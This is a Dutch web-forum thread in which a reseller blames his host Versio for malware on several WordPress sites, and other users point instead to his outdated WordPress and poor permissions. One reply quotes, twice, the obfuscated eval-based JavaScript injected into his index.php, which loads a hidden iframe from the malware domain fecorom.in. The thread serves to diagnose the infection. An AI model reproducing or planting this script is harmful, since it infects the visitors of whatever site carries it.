Versio virus wat te doen

Pagina: 1
Acties:

Onderwerpen


Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Beste mensen van tweakers help!, volgens mij is er een virus op de server van versio wat te doen :(?
lees bericht hieronder wat een kwaliteit service geef ze een 10 van de 10! :(


Chat Content:
Wesley: [20:09] Welkom bij onze live chat. Ik ben Wesley en help u graag met het beantwoorden van korte en snelle vragen over onze diensten, ons klanten panel en de verschillende controle panelen zoals DirectAdmin en SolusVM.

Voor overige vragen dient u contact op te nemen met onze helpdesk via de e-mail adressen die vermeld staan op onze helpdesk pagina.
Gebruiker: [20:09] beste wesley help!!!!
Wesley: [20:09] Wat is er aan de hand ?
Gebruiker: [20:10] nou ik heb een reseller pakket bij versio
[20:10] maar nu blijkt dat meerdere sites besmet zijn
[20:10] en ik durf voor 99% te wedden dat het op jullie server is
[20:10] 1 site kan ik begrijpen
[20:10] maar meerdere neit
[20:13] is het mogelijk dat jullie een virus scan uitvoeren?
[20:13] ik wil best alles overnieuw maken voor mijn klanten maar is best irritant als het er volgend maand weer op is
[20:13] :(
Wesley: [20:14] Onze servers zijn daar tegen beveiligt. Zitten deze websites allemaal onder het zelfde account ?
Gebruiker: [20:14] yup
[20:14] ik hoopte ook stiekem dat ze beveiligt zijn maar ik ben vorig week met een klant de site besmet
[20:14] -_- '
Wesley: [20:14] Dan gaat het van de ene site naar de andere site toe helaas.
[20:14] het kan niet verder dan 1 gebruiker i.v.m rechten
Gebruiker: [20:15] dat is niet mogelijk
[20:15] ik heb wekenlang niks aan die sites gedaan
[20:15] opeens verschijnt het in meerdere
Wesley: [20:15] het kan zijn dat de site gehackt is en zo over gaat naar de andere sites toe
Gebruiker: [20:15] das wel heel vaag
[20:15] en zeker de beveiliging
Wesley: [20:15] of op uw pc staat misschien een virus .
Gebruiker: [20:15] nope niemand is ingelogd
[20:15] nagekeken
[20:16] -_-' ik ben icter
[20:16] en mijn pc is dagelijks virus vrij...
[20:16] maar is goed ik weet genoeg
[20:16] indien die echt besmet is ( jullie server ) dan ga ik het ergens anders overleggen
[20:17] want ik meld dan nu een beveiligingslek en als daar niks mee gedaan word
[20:17] -_-'
Wesley: [20:17] ER is geen beveiligings lek onze servers worden altijd erg in de gaten gehouden voor deze dingen
[20:17] en onze server is volledig dicht voor buiten af
Gebruiker: [20:17] ja maar dat hoor ik overal?
[20:18] heb je het nagevraagd dan
[20:18] of zou je dat kunnen doen?
[20:18] dan zijn wij allebij zeker?
Wesley: [20:18] Ik ben er zelf 100% zeker van dat er geen virus op de server is
[20:18] Het is geen windows wat wij draaien.
Gebruiker: [20:18] ik werk dagelijks met asterisk / ubuntu / linux
[20:18] ga jij mij dat uitleggen?
[20:19] maar aangezien je het geval niet begrijpt neem ik je niet kwalijk
[20:19] werkze!.

Acties:
  • 0 Henk 'm!

Verwijderd

Jezus christ -_-
Lekkere helpdesk daar, alles op de klant afschuiven xD

Acties:
  • 0 Henk 'm!

  • EDIT
  • Registratie: Januari 2007
  • Laatst online: 12:16
Is het ook in je op gekomen dat hij gewoon wel eens gelijk kan hebben er inderdaad geen virus op de server staat? 8)7

In 95% van de gevallen heeft een trojan op jouw eigen PC gewoon je FTP gegevens te pakken gekregen, en bij een reseller account kunnen ze dan bij elke site. Niet zo lastig toch?

Of er hoeft maar een lekke Joomla/Wordpress/brakke custom code installatie op te zitten, en ze wandelen zo langs alle domeinen onder jouw account. Niets bijzonders aan, gebeurt dagelijks.

[ Voor 10% gewijzigd door EDIT op 29-03-2012 20:34 ]


Acties:
  • 0 Henk 'm!

  • vistu
  • Registratie: Januari 2007
  • Laatst online: 11:37
Tja, misschien wel, maar de reactie van TS verdient ook geen schoonheidsprijs. Je komt met geen enkel bewijs dat het aan hun kant zou moeten liggen en gaat direct in de aanval. Wesley zal heus wel een check uitvoeren of er iets aan de hand is, maar ga er niet vanuit dat ie qua communicatie heel open met je zal zijn.

Acties:
  • 0 Henk 'm!

  • ItsValium
  • Registratie: Juni 2009
  • Laatst online: 29-08 23:17
Kan je net omdraaien, klant alle schuld bij de hoster leggen.

En met de info die wij hier lezen in een chat kunnen wij ook niets.

Wat is er gebeurd met de sites, codeinjection? welke code gaat het dan over, alle sites, enkele of slechts één enzoverder ...

Acties:
  • 0 Henk 'm!

  • isNull
  • Registratie: December 2011
  • Laatst online: 26-07-2023
Misschien is het slim om eerst even na te gaan of toch niet iemand achter je login gegevens is gekomen. Je gaat er nu meteen van uit dat de server van Versio besmet is, maar de kans dat dat echt zo is lijkt me klein (maar niet onmogelijk!). Vaak is het echter een lek in de site zelf, of een virus op de PC van de beheerder(s) van de site wat mogelijk de wachtwoorden achterhaald heeft.

Verder vind ik de toon die je aanneemt in het bovenstaande gesprek niet gepast. Je gaat meteen in de aanval terwijl Wesley zo te zien best weet waar hij over praat en je hem niet de kans geeft om het netjes met je op te lossen/uit te zoeken.

[ Voor 14% gewijzigd door isNull op 29-03-2012 20:52 ]


Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Oke even op een rij :)!,

Hoe kwam ik erachter:

Ik ging eergister naar een site van mijn klant ( normale check om paar weke) nu krijg ik gelijk via google chrome een melding:
Waarschuwing: hier klopt iets niet!
www.stichtingiedulfitr.nl bevat inhoud van fecorom.in, een site waarvan bekend is dat deze malware distribueert. Als u deze site bezoekt, kan uw computer worden geïnfecteerd.
Google heeft vastgesteld dat er misschien schadelijke software op uw computer wordt geïnstalleerd wanneer u doorgaat. Als u deze site in het verleden heeft bezocht of de site vertrouwt, is het mogelijk dat de site onlangs door een hacker is geïnfecteerd. Ga niet verder. U kunt het morgen opnieuw proberen of ergens anders naartoe gaan.
We hebben fecorom.in al gemeld dat we malware op de site hebben aangetroffen. Voor meer informatie over de problemen die op fecorom.in zijn gevonden, gaat u naar de Diagnosepagina voor Safe Browsing van Google.
Nu nadat ik de computer overnieuw heb geinstalleerd weer de site bezocht met zelfde melding!, bij mij ligt het dus niet maja geen ramp als het om 1 gaat, das namelijke ff paar weke en hij is zo goed als nieuw... nu ga ik na andere site's van mij krijg ik zelfde meldingen vaaaaaaaaaaaaag!! niemand komt aan me gegevens ik werk vanuit dichte plaatsen!

(isnull ik begrijp je reactie alleen draait het hier om geld en om gezeik van klanten die ik niet verdien, en als wesley dan zegt 100% zeker te zijn nou dan praat die onzin 100% zeker bestaat niet! niet in de ict wereld.. ik verdien een veel betere service heb zoveel pakkete bij ze en hij nam niet eens de moeite om te vragen welke klant ik ben ... heb je daar al naar gekeken? maja in ieder geval ik ben boos -_-' in het kort.

Acties:
  • 0 Henk 'm!

  • RaZ
  • Registratie: November 2000
  • Niet online

RaZ

Funky Cold Medina

En wat heb je zelf al gedaan om uit te zoeken waar die shizzle vandaan komt?

Ik zie dat je WordPress gebruikt. Wellicht een verouderde versie die niet up to date is? Dan kan je wel met een vinger naar je hoster wijzen, maar het probleem ligt niet bij de hoster dan.

Zeker met die chat-log erbij vind ik het behoorlijk onbeschoft dat je het probleem per definitie bij de hoster legt. Enige wat je daar doet, is het huren van een dienst, en geen bewaking op jouw bouwerken. Of dat nu zelf geschreven is, of een OS pakket. Het kan dus liggen in een exploit van WordPress als je een oude versie gebruikt. Maar het kan ook een plugin/aad-on zijn die niet helemaal fris is.

Ik zou je index.php eens checken, wat de laatste regel van de pagina staat:
HTML:
1
<script>c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');md='a';e=window["e"+"val"];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script><script>c=2;i=c-2;if(window.document)try{new c.prototype}catch(hgberger){f=['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n64n63n61n73n76n73n71n8n67n72n9n61n73n79n72n78n11n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');md='a';e=window["e"+"val"];w=f;s=[];r=String;for(;565!=i;i+=1){j=i;s+=r.fromCharCode(38+1*w[j]);}e(s);}</script>


En aangezien die onder de /html staat, is het denk ik niet echt onderdeel van je template.

Dus: Is je WordPress en alle plugins uptodate? Heb je ook het FTP wachtwoord voor het uploaden van de bestanden aangepast? Je weet nu niet waar het euel vandaan komt, maar je moet wel alles gewoon nalopen. Doe wat je zelf kan doen, is het dan opgelost, lag het niet aan de hosting.

Ey!! Macarena \o/


Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
Wordpress is wel vaker slachtoffer van aanvallen op (bekende) veiligheidslekken en proberen ze je site aan te passen / door te sturen / of iets anders malafide te laten doen.

Echter zijn zulke installaties wel jouw verantwoordelijkheid en (zeker) niet die van Versio. Dus mijns inziens moet je het vooral bij je eigen Wordpress-installaties zoeken en niet bij een fout bij Versio.

Wat RaZ dus ook aangeeft, is het een up-to-date installatie van Wordpress en welke bestanden zijn er aangepast?

Overigens wek je met je toon van praten/typen nu niet bepaald veel sympathie en kom je ook niet erg sterk over.

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Dankjewel RaZ jullie zijn een heel stuk verder als mij kwa webscripting en alles, ik zocht bestanden in plaats van verwijzingen!, hartelijk bedankt en voor de rest krijg ik het vermoeden dat ik hier ook aangevallen word dus ik trek me terug ;)! sorry hoor voor diegene die mijn typetaal niet goed vinden!. dat installaties en al mijn eigen verantwoordelijkheid zijn moet ik uit tweakers halen dus als ik problemen heb bij versio moet ik alles zelf uit me neus peuteren en geen service verwachten :) oke ik zal het onthouden...

Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
Je mag zeker wel wat service verwachten van Versio, maar dit soort zaken zijn inderdaad wel je eigen verantwoordelijkheid en niet Verio's. Neemt niet weg dat je ze wel even met je mee hadden kunnen kijken om te zien waar het aan ligt.

Maar goed, Versio is natuurlijk wel een budget hoster, dus het bekende "pay peanuts, get monkeys" gaat daar helaas wel vaak voor op.

Kortom, al je WP-installaties nalopen, updaten en goed je rechten controleren.

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
ik geef zojuist een map 644 rechten en mijn hele website is weg!, ik ga morgen is keihard brullen.. IK ben ze zat.

Acties:
  • 0 Henk 'm!

  • aZuL2001
  • Registratie: September 2002
  • Laatst online: 10-09 01:41
Ik kreeg een (TrendMicro) melding over hxxp://fecorom.in/count1.php

Intussen alleen maar 403 errors

Zal wel via een lek in Wordpress komen.


Edit : als je niet weet wat je aan het doen bent kun je je hoster natuurlijk moeilijk de schuld geven.

Error 1349, incompetent user detected

[ Voor 36% gewijzigd door aZuL2001 op 30-03-2012 00:29 . Reden: aanvulling ]

Abort, Retry, Quake ???


Acties:
  • 0 Henk 'm!

  • Tsurany
  • Registratie: Juni 2006
  • Niet online

Tsurany

⭐⭐⭐⭐⭐

kiko015 schreef op donderdag 29 maart 2012 @ 23:30:
(isnull ik begrijp je reactie alleen draait het hier om geld en om gezeik van klanten die ik niet verdien, en als wesley dan zegt 100% zeker te zijn nou dan praat die onzin 100% zeker bestaat niet! niet in de ict wereld.. ik verdien een veel betere service heb zoveel pakkete bij ze en hij nam niet eens de moeite om te vragen welke klant ik ben ... heb je daar al naar gekeken? maja in ieder geval ik ben boos -_-' in het kort.
Dus jij maakt en onderhoud die websites en jij bent verantwoordelijk voor de beveiliging? Dan verdien jij toch juist dat gezeik? Het is jou verantwoordelijkheid. Jij hebt zeker ook de hoster uit gekozen? Dan neem jij daar ook verantwoordelijkheid voor en dan is het ook jou probleem. Klanten komen bij jou voor een totaal oplossing, als daar dan wat fout aan gaat is dat ook jou probleem.

Jij past zelf ook de rechten aan, daardoor is je website niet meer beschikbaar en dan ga je bij de hoster klagen? Wees een man en neem zelf de verantwoordelijkheid.

SMA SB5.0 + 16x Jinko 310wp OWO + 10x Jinko 310wp WNW |--|--| Daikin 4MXM68N + 1x FTXA50AW + 3x FTXM20N


Acties:
  • 0 Henk 'm!

  • stftweaker
  • Registratie: December 2007
  • Laatst online: 10:10
Een tip waar je heel veel mee kan voorkomen. Backups. Wees slim maak een back-up(om het 1 en ander uit te halen en te zoeken) En zet een vorige backup terug. Sluit dan alle sites af en dan stuk voor stuk aan en kijk of alles up2date is inclusief plugins en templates. En ja als jij niet als verantwoordlijk gehouden wilt worden moet je dit schriftelijk met je klanten zijn overeengekomen. Klanten betalen en jij moet leveren in goede en slechte tijden :) Dus in plaats van bitch mode hup naar werkmode.

How are you doing?


Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
backups stonden ook in de map die kaal is ... dat is namelijk versio backup... ja sorry dat ik niet de beste ben

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
hoe kun je root 644 permissions geven en binnen ongeveer 1 seconde aan honderde mb's kwijt zijn ?? het verwijdere alleen neemt al meer tijd in beslag :S!

Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
Een helemaal (je html root?) op 644 gooien en dan vreemd vinden dat het niet werkt?

"ja sorry dat ik niet de beste ben"
Pretendeer dat dan ook niet te zijn, door te roepen "ik werk dagelijks met asterisk / ubuntu / linux".

Niet dat je nu heel veel aan die aan deze opmerkingen hebt, maar jij zal toch degene zijn die het weer moet fixen.

Wat versta je onder een "map die kaal is"?

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Public_html

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Mod slotje aub.

Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
Ja als je public_html chmod 644 geeft (recursief?) dan gaat Wordpress niet meer werken.

Op welke manier probeer je de map te benaderen?

Slotje vragen we hier normaal gesproken niet om, maar desgewenst kun je een topic report aanmaken door op het handje linksboven te klikken.

Maar je wilt dus niet meer geholpen worden blijkbaar?

Acties:
  • 0 Henk 'm!

  • johnkeates
  • Registratie: Februari 2008
  • Laatst online: 04-07 16:30
Ik zou iemand inhuren die je problemen voor je oplost.

Acties:
  • 0 Henk 'm!

  • ItsValium
  • Registratie: Juni 2009
  • Laatst online: 29-08 23:17
kiko015 no offence maar jij lijkt me het type voorbeeld van een 'zolderkamerhoster'. Ergens een goedkoop reseller pakketje huren en dan doorverkopen aan klanten terwijl je amper de kennis hebt om een wordpress site te onderhouden?

Bij het minste die misloopt de schuld/oorzaak ergens anders zoeken terwijl het toch sterk in de richting van eigen onkunde lijkt te liggen.

Wil je er serieus mee verder, lees je dan eens in in allerhande artikelen over het beveiligen van webservers, en onderhoud sowieso je pakketjes die je gebruikt. Wordpress brengt niet voor niets updates uit net als alle andere beschikbare pakketen. Wil je de kans verkleinen, maak het dan zelf op voorwaarde dat je goed weet hoe je security en gerelateerde zaken moet aanpakken.

En zoals al gezegd ivm Versio : pay peanuts, get monkeys! Dat is in de hosting wereld zeker een feit.

Acties:
  • 0 Henk 'm!

  • DataGhost
  • Registratie: Augustus 2003
  • Laatst online: 12:19

DataGhost

iPL dev

kiko015 schreef op donderdag 29 maart 2012 @ 23:30:
en als [iemand] dan zegt 100% zeker te zijn nou dan praat die onzin 100% zeker bestaat niet! niet in de ict wereld..
niemand komt aan me gegevens ik werk vanuit dichte plaatsen!
Ik heb even je bericht omgedraaid en bijgeknipt, misschien wordt het dan wat duidelijker voor je
kiko015 schreef op donderdag 29 maart 2012 @ 23:30:
Nu nadat ik de computer overnieuw heb geinstalleerd weer de site bezocht met zelfde melding!, bij mij ligt het dus niet maja geen ramp als het om 1 gaat, das namelijke ff paar weke en hij is zo goed als nieuw... nu ga ik na andere site's van mij krijg ik zelfde meldingen vaaaaaaaaaaaaag!! niemand komt aan me gegevens ik werk vanuit dichte plaatsen!
Mag ik vragen hoe je denkt dat het opnieuw installeren van je computer gaat helpen tegen iets wat ergens op een server staat? Daarnaast is het handig om te weten wat voor installatiemedium je hebt gebruikt.
kiko015 schreef op vrijdag 30 maart 2012 @ 00:26:
ik geef zojuist een map 644 rechten en mijn hele website is weg!, ik ga morgen is keihard brullen.. IK ben ze zat.
Kan je mij misschien even uitleggen wat '644' betekent en eventueel wat er voor andere mogelijkheden zijn en wat die betekenen? Dat zal hopelijk wat meer licht op de zaak schijnen. ik weet het wel, dat hoeft niemand anders uit te leggen dus, ik wil het even van kiko015 horen

Acties:
  • 0 Henk 'm!

  • mace
  • Registratie: Juni 2003
  • Laatst online: 09:54

mace

Sapere Aude

-weg-

En kiko015, als jij ICT-er bent wil ik je niet als collega hebben. Brokken maken en dan iedereen de schuld geven behalve jezelf. Beter kalmeer je even, en kijk je wat er nou misgegaan is, zodat je je klanten de dienst kan leveren waar ze voor betalen.

[ Voor 63% gewijzigd door mace op 30-03-2012 10:59 ]


Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
nee ik ben er namelijk al uitgekomen, mijn hele root van me hosting is verwijdert... een crash of iets dergelijks.. ik heb er wel aardig verstand van want heb namelijk allemaal beveiligingmods en htacces bestanden speciaal voor dat aangemaakt, ik heb nu een aanvraag gedaan voor een backup restore bij versio dus dat is mijn oplossing op het moment.. niet slecht bedoelt want jullie hebben me wel geholpen :)! en ik heb de map 644 rechten gegeven ik versta daaronder beperken met aanpassen en alleen laten uitvoeren? maar dan zou wordpress niet moeten verdwijnen maar niet moeten werken ? ik ben op het moment op werk ik zal later even duidelijker formuleren en schrijven druk met voorbereiden van examens voor leerlingen...

Acties:
  • 0 Henk 'm!

  • DataGhost
  • Registratie: Augustus 2003
  • Laatst online: 12:19

DataGhost

iPL dev

Wat een onduidelijk verhaal joh...
kiko015 schreef op vrijdag 30 maart 2012 @ 12:32:
mijn hele root van me hosting is verwijdert... een crash of iets dergelijks.. [...] ik heb de map 644 rechten gegeven ik versta daaronder beperken met aanpassen en alleen laten uitvoeren?
Voor zover ik chocola van je verhaal kan maken kan ik je in ieder geval vertellen dat je uitleg over 644 niet klopt en er een redelijke kans is dat dat de oorzaak is van het eerste deel uit je post (wat in dat geval overigens ook niet klopt maar het zal voor een leek wel zo lijken).

Acties:
  • 0 Henk 'm!

  • mace
  • Registratie: Juni 2003
  • Laatst online: 09:54

mace

Sapere Aude

Mappen met 644 rechten werken niet, lees eens in hoe unix-permissies werken.

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
sorry klopt helemaal :) ik vergis me totaal! maar wel raar dat me root helemaal kaal is ineens???

http://www.freebsd.org/doc/nl/books/handbook/permissions.html ff doorgenomen :)

[ Voor 44% gewijzigd door kiko015 op 30-03-2012 13:47 ]


Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
Met 644 kan er niks uitgevoerd worden, wat voor WP juist wel nodig is lijkt mij.

Daarnaast wat versta je onder "kaal". Wat zie je überhaupt als je via FTP inlogt en dan je html root bekijkt?

Let wel dat je met het terugplaatsen van een backup er natuurlijk nog niet bent.

Acties:
  • 0 Henk 'm!

  • NMe
  • Registratie: Februari 2004
  • Laatst online: 09-09 13:58

NMe

Quia Ego Sic Dico.

kiko015 schreef op vrijdag 30 maart 2012 @ 12:32:
nee ik ben er namelijk al uitgekomen, mijn hele root van me hosting is verwijdert... een crash of iets dergelijks.. ik heb er wel aardig verstand van want heb namelijk allemaal beveiligingmods en htacces bestanden speciaal voor dat aangemaakt, ik heb nu een aanvraag gedaan voor een backup restore bij versio dus dat is mijn oplossing op het moment.. niet slecht bedoelt want jullie hebben me wel geholpen :)! en ik heb de map 644 rechten gegeven ik versta daaronder beperken met aanpassen en alleen laten uitvoeren? maar dan zou wordpress niet moeten verdwijnen maar niet moeten werken ? ik ben op het moment op werk ik zal later even duidelijker formuleren en schrijven druk met voorbereiden van examens voor leerlingen...
Sorry, maar wat een klok/klepel verhaal. Jouw sites kunnen echt niet alleen maar gehackt worden als rechten verkeerd staan of .htaccess-bestanden toegang geven tot de verkeerde files. Veruit de meeste hacks zijn het resultaat van SQL-injectie of cross-site scripting attacks, of zelfs verkeerd beveiligde file uploads. Je legt wel mooi de schuld bij de host neer maar als zij hun omgeving inderdaad zo beveiligd hebben dat jij geen effect kan hebben op de sites van andere users en dat een hack van één van jouw sites dus betekent dat ál jouw sites compromised zijn, dan is het zonder meer plausibel dat een van de sites die je gemaakt hebt (of misschien wel meer dan een...) een kwetsbaarheid heeft die een hacker heeft gebruikt om toegang te krijgen tot je filesystem. Als ik jou was zou ik eens héél verdomd goed naar mijn eigen code kijken en eventuele third party software zoals WordPress updaten indien nodig, want anders ben je volgende week weer de lul, zelfs als je van host zou switchen. 8)7

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.


Acties:
  • 0 Henk 'm!

  • ThinClientQ
  • Registratie: April 2010
  • Laatst online: 17-09 20:53
In alle respect: Je mag wel véél beleefder zijn tegen de helpdesk medewerker, en dan begin ik nog niet over de nederlandse spelling. Ookal ben je 'ICT-er', je bent belabberd in de communicatie. Bel ze even rustig op en overleg het probleem, samen werken aan een oplossing. :) Je reacties hier zijn niet overzichtelijk en goed geschreven, als je hierin tijd in investeert wil ik je gerust een handje helpen. :)

Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Mijn root is gewoon helemaal leeg :), geen enkel bestand meer.. Versio heeft de hoofdsite waarmee ik reseller hosting verkoop ook dichtgegooid zonder te overleggen, ik wacht het even af!..

Ik heb nog niet verder met ze gecommuniceerd aangezien mijn site niet super belangrijk is.
Ik ben ook nog aan het kijken voor een juiste oplossing, en misschien switchen van wordpress naar html
site's zonder echte scripts.. maar moet nog even kijken zoals ik al zij...

Ik wil daarom ook iedereen van tweakers bedanken jullie helpen mij weer is :)!!!!!!

Acties:
  • 0 Henk 'm!

  • bartbh
  • Registratie: Maart 2004
  • Niet online
"This account has been suspended.
Either the domain has been overused, or the reseller ran out of resources."

Heb je teveel dataverkeer verstookt misschien?

Maar dan nog, dat je root ineens leeg zou wel heel vreemd zijn. Maar aangezien je nog automatisch wordt doorgestuurd naar /blog/ zou ik denken dat er op z'n minst nog een .htaccess in staat en de root dus niet geheel leeg is. Misschien omdat je account geblokkeerd is, lijkt het daarom alsof deze leeg is?

Switchen naar puur html is misschien wel veiliger, maar of het handig is.

Acties:
  • 0 Henk 'm!

  • NMe
  • Registratie: Februari 2004
  • Laatst online: 09-09 13:58

NMe

Quia Ego Sic Dico.

Als je te weinig kennis in huis hebt om een dynamische website te onderhouden is het inderdaad misschien beter om er dan maar een statische site van te maken.

Verder klinkt het alsof die hacker, mogelijk via FTP, al je dataverkeer verstookt heeft.

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.


Acties:
  • 0 Henk 'm!

  • kiko015
  • Registratie: Oktober 2011
  • Laatst online: 14-09 17:28
Even voor duidelijkheid :) ( ik heb nog 150GB aan dataverkeer beschikbaar! )

Ik ben het allemaal aan het nakijken alleen heb nu niks in me root w8 dus even op versio :)!, bedankt voor de snelle response! geweldig :)!

wat leuks gevonden
chmod 777 op een map betekent dat alle gebruikers (en dus alle processen) die bij die map kunnen komen (door de rechten van de bovenliggende mappen) het recht hebben om in die doelmap te komen en om daar bestanden te schrijven.

Als de bestanden zelf ook mode 777 hebben dan mag elke gebruiker (en elk proces) wat bij dat bestand kan komen (door de 777 van de map en de rechten van de bovenliggende mappen) het bestand lezen, schrijven (en dus ook aanpassen) en uitvoeren.

De extentie heeft geen betekenis, je kunt een stuk PHP code ook opslaan als "viesplaatje.gif".
Op inhoud controleren heeft alleen zin als je dat met 100% zekerheid kunt doen. Je kunt een PHP script ook laten beginnen met de GIF of JPG header en daarna overgaat naar PHP code. Bij het uitvoeren poept dat wel de header uit maar gaat daarna nog gevaarlijke dingen doen.
Waar je het upload is niet van bijzonder belang, behalve voor de rechten die je aan die map toekent.


Maar in plaats van "kan 777 kwaad" moet je denk ik eerder vragen "waarom 777?". Je wilt bestanden die worden geupload nooit uitvoeren, nooit, punt. Dus het bestand zelf krijgt nooit 777 maar hooguit 666.
De map waar je de bestanden in zet is van jou (anders kun je er geen rechten op zetten) dus hoeven de 'others' van de server er niet bij: 660.
Voor de map moet je kunnen volstaan met 770 en voor de bestanden met 660.
Quote


omdat een hacker eerst op je server moet komen via een lek in het script en dan pas vanuit je root naar de betreffende map kan.
Dat valt wel mee, een hacker hoeft vaak niet te zoeken naar waar de bestanden staan, omdat jouw scripts de lokatie zelf al regelen.

Exact hetzelfde probleem heb je bij encryptie, daar denkt men ook altijd dat een hacker eerst de encryptiesleutel moet opzoeken, maar de scripts decrypten alle data al, anders kunnen ze we immers niet mee werken, dus een hacker hoeft ook niet te zoeken naar waar de beuploade bestanden terecht zijn gekomen; jouw scripts halen de bestanden zelf al op uit die lokatie.
